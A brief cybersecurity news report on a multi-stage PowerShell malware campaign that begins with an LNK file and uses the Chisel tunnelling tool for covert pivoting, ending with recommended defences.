A sophisticated cyberattack uses PowerShell scripts and the tunnelling tool Chisel to infiltrate systems, evading detection and maintaining long-term control covertly. The attack starts with an innocuous LNK file that initiates a multi-stage infection, allowing attackers to scan internal networks and establish hidden communication channels.
The newly identified campaign initiates with a malicious LNK file that activates a layered PowerShell-baed infection chain. This infection chain includes three stages designed to establish persistence, communicate with a remote C2 server, and execute additional commands as needed.
This tactic underscores a methodological approach to ensure long-term control over targeted systems.
The attack’s multi-stage nature allows each step to function independently while supporting subsequent stages:

- Stage 1: The initial PowerShell script, launched by the LNK file, establishes a hidden foothold on the system. It configures secure communications, gathers system data, and stores obfuscated details that are later used to communicate with the C2 server.
- Stage 2: The second script enhances the attacker’s control by creating additional connections to the C2 server. It downloads further scripts that continue the infection chain and builds on the attacker’s initial access.
- Stage 3: The third and final PowerShell script includes commands to maintain remote access. It continuously interacts with the C2 server, executing commands as directed by the threat actor.

During each infection stage, PowerShell scripts communicate with the C2 server through various layers of obfuscation. The scripts perform tasks such as establishing TLS 1.2 connections, encoding information in Base64, and managing authorisation headers to mimic legitimate activity.
A particularly revealing element in the attack is the use of Chisel — a tunnelling tool that allows attackers to create secure channels through firewalls and interact with protected internal networks. By employing Chisel, threat actors can pivot within compromised environments, scan internal networks, and even access isolated systems through a SOCKS proxy, all while avoiding detection.
Researchers noted that the threat actors use Netskope, a cloud security proxy, to relay data through encrypted channels, further obscuring malicious traffic. The combination of Chisel and Netskope allows threat actors to evade traditional network defences, making it difficult for security teams to intercept or block the malicious data flow.
Cybersecurity experts have urged users to deploy antivirus software, restrict PowerShell access controls to essential personnel, implement a ‘constrained language mode,’ and monitor network traffic, especially through tools like Chisel.
In the News: Wikipedia to serve summons to editors in ANI defamation case